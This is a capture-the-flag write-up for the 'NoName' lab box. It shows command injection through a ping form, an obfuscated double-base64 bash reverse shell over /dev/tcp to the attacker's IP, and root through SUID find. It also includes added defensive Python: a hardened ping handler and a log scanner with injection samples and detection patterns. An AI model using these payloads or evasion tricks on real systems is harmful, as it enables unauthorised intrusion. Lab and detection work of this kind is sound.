# NoName

## Nmap

```
sudo nmap 192.168.64.15 -p- -sS -sV

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
```

Browsing to the target address lands us on a page headed 'Fake Admin Area'. This page has a query box. I was unable to get any output from this or perform any command injection.

![/index.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-821bacefe79108edcb99d33e74548b91594b49e0%2Fimage.png?alt=media)

Further enumeration shows the /admin page being valid. This presents the page below.

![/admin](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cebaccb7b4f8c7e8a704d635145ddeaf1b08b62d%2Fimage.png?alt=media)

Nothing interesting here but we do have something in the page source.

![/admin](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b0571a653a9848d32fa151674659b02fe121ab64%2Fimage.png?alt=media)

So far there is nowhere to use this, but we can take a note of it. I decided from here to run some more specific enumeration against the target. Running `dirsearch.py` with the .txt and .php suffixes appended to each wordlist entry, I was able to identify the /superadmin.php page.

```
python3 dirsearch.py -u http://192.168.64.15/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 75 --full-url --suffix=.txt,.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0d8815eb452f55d1143a70451b539cda103d86d0%2Fimage.png?alt=media)

So far this looks almost the same as the other page, but here we can actually test whether the ping function works.

![/superadmin.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fcc4153136df643562fe80f325ecb0cda500b6d9%2Fimage.png?alt=media)

Running `tcpdump` on our attacking machine to listen on the tun0 interface for ICMP packets, we can ping our attacking machine from the web form and confirm whether ICMP packets arrive.

Start `tcpdump`:

```
sudo tcpdump -i tun0 icmp
```

After pinging our attacking machine from the web interface, we see results showing that ping is working.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2582445e25582fb96cfc0efef7b7974546706507%2Fimage.png?alt=media)

Ideally we want to perform some form of command injection. Testing with the interface shows we need an IP at the beginning of the command regardless. The linked GitHub repository has a large number of command injection techniques to try: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection>

After some testing I found the following to work:

```
<IP> | <Command>
```

Switching over to `Burpsuite` we can see the value `192.168.49.79 | id` was sent as a query and returned valid results in the response.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a13d4a939b5e22fd7fe9ecdb1460005663d078c2%2Fimage.png?alt=media)
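The root cause of the injection above is user input concatenated into a shell command line. As an added example (not code from the box or this writeup, and the `-c 3` ping count is an assumption), here is a hypothetical reconstruction of that vulnerable pattern next to a hardened handler that allowlists a single IP literal and never hands the value to a shell:

```python
import ipaddress
from typing import List

# Hypothetical reconstruction of the pattern a form like /superadmin.php
# follows: the submitted value is concatenated into a shell command line, so
# "<IP> | <Command>" reaches /bin/sh intact.  The "-c 3" count is an assumption.
# This only builds the string; nothing here executes it.
def vulnerable_ping_command(target: str) -> str:
    return f"ping -c 3 {target}"


def hardened_ping_argv(target: str) -> List[str]:
    """Allowlist the input as exactly one IP literal and return an argv list.

    The list is meant for subprocess.run(argv, shell=False): even if validation
    were ever bypassed, no shell is present to interpret '|', ';' or ${IFS}.
    """
    candidate = target.strip()
    try:
        ip = ipaddress.ip_address(candidate)  # ValueError on anything but an IP
    except ValueError:
        raise ValueError(f"rejected ping target: {candidate!r}") from None
    return ["ping", "-c", "3", str(ip)]


def accepts(target: str) -> bool:
    """True when the hardened handler would run ping for this input."""
    try:
        hardened_ping_argv(target)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for sample in ("192.168.49.79", "192.168.49.79 | id", "192.168.49.79;id"):
        print(f"{sample!r}: shell string {vulnerable_ping_command(sample)!r}, "
              f"hardened accepts={accepts(sample)}")
```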

From here I ran the following command in a terminal to generate double base64-encoded output.

```
echo "echo $(echo 'bash -i >& /dev/tcp/192.168.49.79/80 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

#Output

echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqYzVMemd3SURBK0pqRUsK|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

Then I URL-encoded the output, combined with the ping part of the command, using the Burp Suite encoder.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1a2335a7efe5bdfa640a80b4005f78b045c40875%2Fimage.png?alt=media)

Then submitted the URL encoded value as a parameter in `Burpsuite`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1c671f5562f667d52fdaf6b0d248e20d28cad64f%2Fimage.png?alt=media)

This resulted in a reverse shell on our `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4023bb06ec73bab09f65eb0c5c0fcb02e8de6c15%2Fimage.png?alt=media)
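The `${IFS}` substitution and `ba''se''64` quote splitting used above are there to defeat naive string matching on the request. As an added example (not code from the writeup), this scanner reads constructed Apache access-log lines, undoes both tricks, and then checks the decoded parameter for shell metacharacters and decode chains; the parameter name `ip`, the GET method and the short base64 token are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlparse

# Constructed Apache access-log lines (not taken from the writeup).  The
# parameter name "ip", the GET method and the token QUJDREVG are assumptions;
# the third line uses the writeup's evasion style: ${IFS} for spaces and ''
# splitting inside "base64 -d" and "bash".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /superadmin.php?ip=192.168.64.15 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /superadmin.php?ip=192.168.49.79+%7C+id HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /superadmin.php?ip=192.168.49.79%7Cecho%24%7BIFS%7DQUJDREVG%7Cba%27%27se%27%2764%24%7BIFS%7D-%27%27d%7Cb%27%27a%27%27s%27%27h HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[|;&`<>\n]|\$\(")
DECODE_CHAIN = re.compile(r"base64\s+-d|\bbash\b|\bsh\b|/dev/tcp/")


def normalize(value: str) -> str:
    """Undo the two tricks so the patterns match the command the shell sees."""
    value = value.replace("${IFS}", " ").replace("$IFS", " ")
    return value.replace("''", "").replace('""', "")  # ba''se''64 -> base64


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one alert per query parameter that looks like command injection."""
    alerts = []
    for line in log_text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        # parse_qs URL-decodes values and expands '+' to a space for us.
        params = parse_qs(urlparse(match.group(1)).query)
        for name, values in params.items():
            for raw in values:
                norm = normalize(raw)
                hits = []
                if SHELL_META.search(norm):
                    hits.append("shell-metachar")
                if DECODE_CHAIN.search(norm):
                    hits.append("decode-chain")
                if "${IFS}" in raw or "''" in raw:
                    hits.append("obfuscation")
                if hits:
                    alerts.append({"param": name, "normalized": norm, "indicators": hits})
    return alerts
```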

From here I transferred over `linpeas`, which, after running, found that the `find` binary has the SUID bit set.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3d8ee27c92ddd4b494e6b88d89c1daa3b9243cb8%2Fimage.png?alt=media)

Searching [GTFOBins](https://gtfobins.github.io/gtfobins/find/) we find this can be used to spawn a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9675e20d7a0c54ba846b4bb2ad50c74813bf2304%2Fimage.png?alt=media)

I then ran the following command to gain a root shell.

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-64580feb20fc80d4e0d9fb797eb4b7cf92bc608c%2Fimage.png?alt=media)
